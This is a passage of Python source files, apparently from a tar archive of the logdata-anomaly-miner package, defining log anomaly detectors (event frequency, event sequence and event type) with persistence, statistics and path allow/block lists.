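                    manh_max += max(weighted_count, weighted_known)
            # manh_max is zero when both vectors are empty; the score then stays 0, otherwise normalize.
            score = 0
            if manh_max != 0:
                score = manh / manh_max
            if score <= self.confidence_factor:
                # Found similar vector; abort early to avoid spending time on more checks
                return -1
            min_score = min(min_score, score)
        return min_score

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.

        @return seconds until the next persistence is due (the configured period when no time is scheduled yet).
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """
        Immediately write persistence data to storage.

        Layout matches the loader in __init__: [known count vectors, idf id tuples, idf id sets per event].
        The former debug print of known_counts is dropped: it wrote the whole model (values taken from log lines)
        to stdout on every persistence cycle.
        """
        known_counts_data = []
        for id_tuple, vec_list in self.known_counts.items():
            id_tuple_data = []
            for vec_elem in vec_list:
                window_data = [(log_ev, freq) for log_ev, freq in vec_elem.items()]
                id_tuple_data.append(window_data)
            known_counts_data.append((id_tuple, id_tuple_data))
        idf_total_data = []
        idf_counts_data = []
        if self.idf and self.id_path_list:
            idf_total_data = list(self.idf_total)
            for log_ev, id_list in self.idf_counts.items():
                # Convert the set to a list, as already done for idf_total above, so the JSON layer sees plain lists.
                idf_counts_data.append((log_ev, list(id_list)))
        persist_data = [known_counts_data, idf_total_data, idf_counts_data]
        PersistenceUtil.store_json(self.persistence_file_name, persist_data)
        logging.getLogger(DEBUG_LOG_NAME).debug('%s persisted data.', self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """
        Allowlist an event generated by this source using the information emitted when generating the event.

        The path in event_data is appended to constraint_list (if not already present).
        @param allowlisting_data must be None; this detector interprets no extra data.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = 'Allowlisting data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        return f'Allowlisted path {event_data}.'

    def blocklist_event(self, event_type, event_data, blocklisting_data):
        """
        Blocklist an event generated by this source using the information emitted when generating the event.

        The path in event_data is appended to ignore_list (if not already present).
        @param blocklisting_data must be None; this detector interprets no extra data.
        @return a message with information about blocklisting
        @throws Exception when blocklisting of this special event using given blocklisting_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if blocklisting_data is not None:
            msg = 'Blocklisting data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.ignore_list:
            self.ignore_list.append(event_data)
        return f'Blocklisted path {event_data}.'

    def log_statistics(self, component_name):
        """
        Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        Levels 1 and 2 emit the same line for this detector; counters cover the reporting interval and are reset afterwards.
        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL in (1, 2):
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully in %d "
                "time windows in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_windows)
        self.log_success = 0
        self.log_total = 0
        self.log_windows = 0
EventFrequencyDetector.py000066400000000000000000000720461437606560100357710ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""
This module defines a detector for event and value frequency deviations.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.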
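You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import time
import os
import logging
import numpy as np
from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\
    STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class EventFrequencyDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface):
    """This class creates events when event or value frequencies change."""

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, scoring_path_list=None, unique_path_list=None,
                 window_size=600, num_windows=50, confidence_factor=0.33, empty_window_warnings=True, early_exceeding_anomaly_output=False,
                 set_lower_limit=None, set_upper_limit=None, persistence_id='Default', learn_mode=False, output_logline=True,
                 ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.
        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined
               occurrences. When no paths are specified, the events given by the full path list are analyzed.
        @param scoring_path_list parser paths of values to be analyzed by following event handlers like the ScoringEventHandler.
               Multiple paths mean that values are analyzed by their combined occurrences.
        @param unique_path_list parser paths of values where only unique value occurrences should be counted for every value occurring
               in target_path_list.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param window_size the length of the time window for counting in seconds.
        @param num_windows the number of previous time windows considered for expected frequency estimation.
        @param confidence_factor defines range of tolerable deviation of measured frequency from expected frequency according to
               occurrences_mean +- occurrences_std / self.confidence_factor. Default value is 0.33 = 3*sigma deviation.
               confidence_factor must be in range [0, 1].
        @param empty_window_warnings whether anomalies should be generated for too small window sizes.
        @param early_exceeding_anomaly_output states if an anomaly should be raised the first time the appearance count exceeds the range.
        @param set_lower_limit sets the lower limit of the frequency test to the specified value.
        @param set_upper_limit sets the upper limit of the frequency test to the specified value.
        @param persistence_id name of persistence document.
        @param learn_mode specifies whether new frequency measurements override ground truth frequencies.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are
               omitted. The default value is [] as None is not iterable.
        @param constraint_list list of paths that have to be present in the log atom to be analyzed.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        super().__init__(
            mutable_default_args=["target_path_list", "scoring_path_list", "ignore_list", "constraint_list"],
            aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list,
            scoring_path_list=scoring_path_list, unique_path_list=unique_path_list, window_size=window_size, num_windows=num_windows,
            confidence_factor=confidence_factor, empty_window_warnings=empty_window_warnings,
            early_exceeding_anomaly_output=early_exceeding_anomaly_output, set_lower_limit=set_lower_limit,
            set_upper_limit=set_upper_limit, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline,
            ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time
        )
        self.next_check_time = None  # end of the current time window, set by the first received atom
        self.counts = {}  # log event -> list of per-window counts, last entry is the current window
        self.scoring_value_list = {}  # log event -> values collected from scoring_path_list
        self.unique_values = {}  # log event -> set of unique_path_list values seen in the current window
        self.ranges = {}  # log event -> expected frequency range, or None when it must be recalculated
        self.exceeded_range_frequency = {}  # log event -> whether an early-exceeding warning was already sent
        self.log_windows = 0
        self.last_seen_log = {}  # log event -> last log atom, reported with anomalies
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        # Persisted data contains lists of event-frequency pairs, i.e., [[log_event, [freq, ...]], [log_event, [freq, ...]], ...]
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            for entry in persistence_data:
                log_event = entry[0]
                freqs = entry[1]
                # In case that num_windows differ, only take as many as possible; the appended 0 starts the current window.
                self.counts[tuple(log_event)] = freqs[max(0, len(freqs) - num_windows - 1):] + [0]
                if len(self.scoring_path_list) > 0:
                    self.scoring_value_list[tuple(log_event)] = []
            # Lazy %s formatting, consistent with the other detectors in this package.
            logging.getLogger(DEBUG_LOG_NAME).debug('%s loaded persistence data.', self.__class__.__name__)

    def receive_atom(self, log_atom):
        """Receive a log atom from a source."""
        parser_match = log_atom.parser_match
        self.log_total += 1
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the " + str(self.__class__.__name__) + ".")
            self.learn_mode = False

        # Skip paths from ignore list.
        for ignore_path in self.ignore_list:
            if ignore_path in parser_match.get_match_dictionary().keys():
                return

        if self.target_path_list is None or len(self.target_path_list) == 0:
            # Event is defined by the full path of log atom.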
constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return log_event = tuple(parser_match.get_match_dictionary().keys()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return log_event = tuple(values) # Get values that occur in unique_path_list unique_path_value = None if self.unique_path_list is not None and len(self.unique_path_list) != 0: values = [] for path in self.unique_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) values.append(value) # Initialize unique values for current log event if log_event not in self.unique_values: self.unique_values[log_event] = set() unique_path_value = tuple(values) # Store copy of last seen instance of raw log event to correctly show affected event type when anomaly occurs. self.last_seen_log[log_event] = log_atom if self.next_check_time is None: # First processed log atom, initialize next check time. 
self.next_check_time = log_atom.atom_time + self.window_size self.log_windows += 1 elif log_atom.atom_time >= self.next_check_time: # Log atom exceeded next check time; time window is complete. self.next_check_time = self.next_check_time + self.window_size self.log_windows += 1 # Update next_check_time if a time window was skipped skipped_windows = 0 if log_atom.atom_time >= self.next_check_time: skipped_windows = 1 + int((log_atom.atom_time - self.next_check_time) / self.window_size) self.next_check_time = self.next_check_time + skipped_windows * self.window_size # Output anomaly in case that no log event occurs within a time window if self.empty_window_warnings is True: analysis_component = {'AffectedLogAtomPaths': self.target_path_list} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'No log events received in time window', [''], event_data, log_atom, self) for log_ev in self.counts: # Check if ranges should be initialised if log_ev not in self.ranges: self.ranges[log_ev] = None self.exceeded_range_frequency[log_ev] = False # Calculate the ranges if it was not already calculated if self.ranges[log_ev] is None: self.ranges[log_ev] = self.calculate_range(log_ev) if log_ev not in self.counts or (len(self.counts[log_ev]) < 2 and ( self.set_lower_limit is None or self.set_upper_limit is None)): # At least counts from 1 window necessary for prediction self.reset_counter(log_ev) continue # Compare log event frequency of previous time windows and current time window if self.counts[log_ev][-1] < self.ranges[log_ev][0] or self.counts[log_ev][-1] > self.ranges[log_ev][1]: occurrences_mean = (self.ranges[log_ev][0] + self.ranges[log_ev][1]) / 2 try: data = self.last_seen_log[log_ev].raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(self.last_seen_log[log_ev].raw_data) if self.output_logline: original_log_line_prefix = 
self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [self.last_seen_log[log_ev].parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': list(log_ev)} frequency_info = {'ExpectedLogAtomValuesFrequency': occurrences_mean, 'ExpectedLogAtomValuesFrequencyRange': [ np.ceil(max(0, self.ranges[log_ev][0])), np.floor(self.ranges[log_ev][1])], 'LogAtomValuesFrequency': self.counts[log_ev][-1], 'WindowSize': self.window_size, 'ConfidenceFactor': self.confidence_factor, 'Confidence': 1 - min(occurrences_mean, self.counts[log_ev][-1]) / max(occurrences_mean, self.counts[log_ev][-1])} # In case that scoring_path_list is set, give their values to the event handlers for further analysis. if len(self.scoring_path_list) > 0: frequency_info['IdValues'] = self.scoring_value_list[log_ev] event_data = {'AnalysisComponent': analysis_component, 'FrequencyData': frequency_info} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Frequency anomaly detected', sorted_log_lines, event_data, self.last_seen_log[log_ev], self) # Reset exceeded_range_frequency to output a warning when the count exceedes the ranges next time self.exceeded_range_frequency[log_ev] = False # Reset counter and range estimation for _ in range(skipped_windows + 1): self.reset_counter(log_ev) self.ranges[log_ev] = None # Reset all stored unique values for every log event for log_ev in self.unique_values: self.unique_values[log_ev] = set() elif self.early_exceeding_anomaly_output and log_event in self.counts and (len(self.counts[log_event]) >= 2 or ( self.set_lower_limit is not None and self.set_upper_limit is not None)): # Check if the count exceeds the range and output a warning the first time the range exceeds it if log_event not in 
self.ranges: self.ranges[log_event] = None self.exceeded_range_frequency[log_event] = False # Calculate the ranges if it was not already calculated if self.ranges[log_event] is None: self.ranges[log_event] = self.calculate_range(log_event) # Compare log event frequency of previous time windows and current time window if self.counts[log_event][-1] > self.ranges[log_event][1] and not self.exceeded_range_frequency[log_event]: occurrences_mean = (self.ranges[log_event][0] + self.ranges[log_event][1]) / 2 self.exceeded_range_frequency[log_event] = True try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': list(log_event)} frequency_info = {'ExpectedLogAtomValuesFrequency': occurrences_mean, 'ExpectedLogAtomValuesFrequencyRange': [ np.ceil(max(0, self.ranges[log_event][0])), np.floor(self.ranges[log_event][1])], 'LogAtomValuesFrequency': self.counts[log_event][-1], 'WindowSize': self.window_size, 'ConfidenceFactor': self.confidence_factor} event_data = {'AnalysisComponent': analysis_component, 'FrequencyData': frequency_info} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Frequency exceeds range for the first time', sorted_log_lines, event_data, log_atom, self) # Get the id list if the scoring_path_list is set and save it for the anomaly message if len(self.scoring_path_list) > 0: for scoring_path in self.scoring_path_list: scoring_match = log_atom.parser_match.get_match_dictionary().get(scoring_path) if scoring_match is not None: # Get the value of the current path 
if isinstance(scoring_match.match_object, bytes): scoring_value = scoring_match.match_object.decode(AminerConfig.ENCODING) else: scoring_value = scoring_match.match_object # Save the value in the list if log_event in self.counts: self.scoring_value_list[log_event].append(scoring_value) else: self.scoring_value_list[log_event] = [scoring_value] # Increase count for observed events if log_event in self.counts: if unique_path_value is not None: # When unique path is set, only increase count when value has not been observed before if unique_path_value not in self.unique_values[log_event]: self.counts[log_event][-1] += 1 self.unique_values[log_event].add(unique_path_value) else: self.counts[log_event][-1] += 1 else: self.counts[log_event] = [1] self.log_success += 1 def reset_counter(self, log_event): """Create count index for new time window""" if self.learn_mode is True: if len(self.counts[log_event]) <= self.num_windows + 1: self.counts[log_event].append(0) else: self.counts[log_event] = self.counts[log_event][1:] + [0] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time else: self.counts[log_event][-1] = 0 # Reset scoring_value_list if len(self.scoring_path_list) > 0: self.scoring_value_list[log_event] = [] def calculate_range(self, log_event): """Calculate the corresponding range to log_event.""" if self.set_lower_limit is None or self.set_upper_limit is None: if log_event not in self.counts or len(self.counts[log_event]) < 2: return None occurrences_mean = -1 occurrences_std = -1 occurrences_mean = np.mean(self.counts[log_event][-self.num_windows-1:-1]) if len(self.counts[log_event][-self.num_windows-1:-1]) > 1: # Only compute standard deviation for at least 2 observed counts occurrences_std = np.std(self.counts[log_event][-self.num_windows-1:-1]) else: # Otherwise use default value so that only (1 - confidence_factor) relevant (other factor 
cancels out) occurrences_std = occurrences_mean * (1 - self.confidence_factor) # Calculate limits if self.set_lower_limit is not None: lower_limit = self.set_lower_limit else: lower_limit = occurrences_mean - occurrences_std / self.confidence_factor if self.set_upper_limit is not None: upper_limit = self.set_upper_limit else: upper_limit = occurrences_mean + occurrences_std / self.confidence_factor return [lower_limit, upper_limit] def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persist_data = [] for log_ev, freqs in self.counts.items(): # Skip last count as the time window may not be complete yet and count thus too low persist_data.append((log_ev, freqs[:-1])) PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(DEBUG_LOG_NAME).debug(str(self.__class__.__name__) + ' persisted data.') def print_persistency_event(self, event_type, event_data): """ Prints the persistency of component_name. Event_data specifies what information is outputed. @return a message with information about the persistency. @throws Exception when the output for the event_data was not possible. 
""" if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has one of the stated formats if not (isinstance(event_data, list) and len(event_data) <= 1 and ((len(event_data) == 1 and (self.target_path_list is None or ( isinstance(event_data[0], list) and len(event_data[0]) in [0, len(self.target_path_list)])) and all(isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)): msg = 'Event_data has the wrong format. ' \ 'The supported formats are [] and [path_value_list], where the path value list is a list of strings with the same ' \ 'length as the defined paths in the config.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples for i in range(len(event_data)): event_data[i] = tuple(event_data[i]) if len(event_data) == 0: # Print the set of all appeared path values if no event_data is given values_set = set(self.counts.keys()) values_list = list(values_set) values_list.sort() string = f'Event frequency is tracked for the following path values: {values_list}' elif len(event_data) == 1: # Print the current count, the frequency interval and the time when the counter resets if event_data[0] in self.ranges and self.ranges[event_data[0]] is None and len(self.counts[event_data[0]]) > 1: self.ranges[event_data[0]] = self.calculate_range(event_data[0]) # Set output string if event_data[0] in self.counts and self.ranges[event_data[0]] is not None: if self.counts[event_data[0]][-1] < self.ranges[event_data[0]][0] or\ self.counts[event_data[0]][-1] > self.ranges[event_data[0]][1]: string = f'The current count {self.counts[event_data[0]][-1]} is outside the frequency interval ['\ f'{self.ranges[event_data[0]][0]}, {self.ranges[event_data[0]][1]}] for {event_data[0]}. 
'\ f'The count will reset at {self.next_check_time} (unix time stamp)' else: string = f'The current count {self.counts[event_data[0]][-1]} is in the frequency interval ['\ f'{self.ranges[event_data[0]][0]}, {self.ranges[event_data[0]][1]}] for {event_data[0]}. '\ f'The count will reset at {self.next_check_time} (unix time stamp)' else: string = f'Persistency includes no information for {event_data[0]}.' return string def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' 
def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'" + str(component_name) + "' processed " + str(self.log_success) + ' out of ' + str(self.log_total) + ' log atoms successfully in ' + str(self.log_windows) + " time windows in the last 60 minutes.") elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'" + str(component_name) + "' processed " + str(self.log_success) + ' out of ' + str(self.log_total) + ' log atoms successfully in ' + str(self.log_windows) + " time windows in the last 60 minutes.") self.log_success = 0 self.log_total = 0 self.log_windows = 0 def get_weight_analysis_field_path(self): """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler.""" if self.scoring_path_list: return ['FrequencyData', 'IdValues'] return [] def get_weight_output_field_path(self): """Return the path where the ScoringEventHandler adds the scorings in the output of the detector.""" if self.scoring_path_list: return ['FrequencyData', 'Scoring'] return [] EventSequenceDetector.py000066400000000000000000000376451437606560100356100ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an detector for event and value sequences. The concept is based on STIDE which was first published by Forrest, S., Hofmeyr, S. A., Somayaji, A., & Longstaff, T. A. (1996, May). A sense of self for unix processes. In Proceedings of the 1996 IEEE Symposium on Security and Privacy (pp. 120-128). IEEE. 
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventSequenceDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when new event or value sequences were found.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list=None, target_path_list=None, seq_len=3, allow_missing_id=False, timeout=-1, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. 
Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available. @param seq_len the length of the sequences to be learned (larger lengths increase precision, but may overfit the data). @param allow_missing_id specifies whether log atoms without id path should be omitted (only if id path is set). @param timeout maximum allowed seconds between two entries of sequence; sequence is split in subsequences if exceeded. @param persistence_id name of persistence file. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. 
""" # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["id_path_list", "target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list, target_path_list=target_path_list, seq_len=seq_len, allow_missing_id=allow_missing_id, timeout=timeout, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.sequences = set() self.current_sequences = {} self.last_seen_times = {} self.log_learned = 0 self.log_learned_sequences = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) # Persisted data contains lists of sequences, i.e., [[, ], [. """ import time import logging from aminer import AminerConfig from aminer.AminerConfig import build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class EventTypeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class keeps track of the found event types and the values of each variable.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, persistence_id='Default', target_path_list=None, id_path_list=None, allow_missing_id=False, allowed_id_tuples=None, min_num_vals=1000, max_num_vals=1500, save_values=True): """ Initialize the detector. 
This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param id_path_list specifies group identifiers for which data should be learned/analyzed. One or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). @param allow_missing_id specifies whether log atoms without id path should be omitted (only if id path is set). @param min_num_vals number of the values which the list of stored logline values is being reduced to. @param max_num_vals the maximum list size of the stored logline values before being reduced to the last min_num_values. @param save_values if false the values of the log atom are not saved for further analysis. This disables values and check_variables. """ # avoid "defined outside init" issue self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( mutable_default_args=["id_path_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, target_path_list=target_path_list, id_path_list=id_path_list, allow_missing_id=allow_missing_id, allowed_id_tuples=allowed_id_tuples, min_num_vals=min_num_vals, max_num_vals=max_num_vals, save_values=save_values ) self.num_events = 0 self.longest_path = [] # List of the longest path of the events self.found_keys = [] # List of the keys corresponding to the events self.variable_key_list = [] # List of the keys, which take values in the log line # List of the values of the log lines. 
If the length reaches max_num_vals the list gets reduced to min_num_vals values per variable self.values = [] self.num_event_lines = [] # Saves the number of lines of the event types self.total_records = 0 # Saves the number of total log lines # List of the modules which follow the event_type_detector. The implemented modules are form the list # [VariableTypeDetector, VariableCorrelationDetector, TSAArimaDetector] self.following_modules = [] self.check_variables = [] # List of bools, which state if the variables of variable_key_list are updated. # List ot the time trigger. The first list states the times when something should be triggered, the second list states the indices # of the event types, or a list of the event type, a path and a value which should be counted (-1 for an initialization) # the third list states, the length of the time step (-1 for a one time trigger) self.etd_time_trigger = [[], [], []] self.num_event_lines_tsa_ref = [] # Reference containing the number of lines of the events for the TSA self.current_index = 0 # Index of the event type of the current log line self.id_path_list_tuples = [] # List of the id tuples # Loads the persistence self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) # Imports the persistence if persistence_data is not None: for key in persistence_data[0]: self.found_keys.append(set(key)) self.variable_key_list = persistence_data[1] self.values = persistence_data[2] self.longest_path = persistence_data[3] self.check_variables = persistence_data[4] self.num_event_lines = persistence_data[5] self.id_path_list_tuples = [tuple(tuple_list) for tuple_list in persistence_data[6]] self.num_events = len(self.found_keys) def receive_atom(self, log_atom): 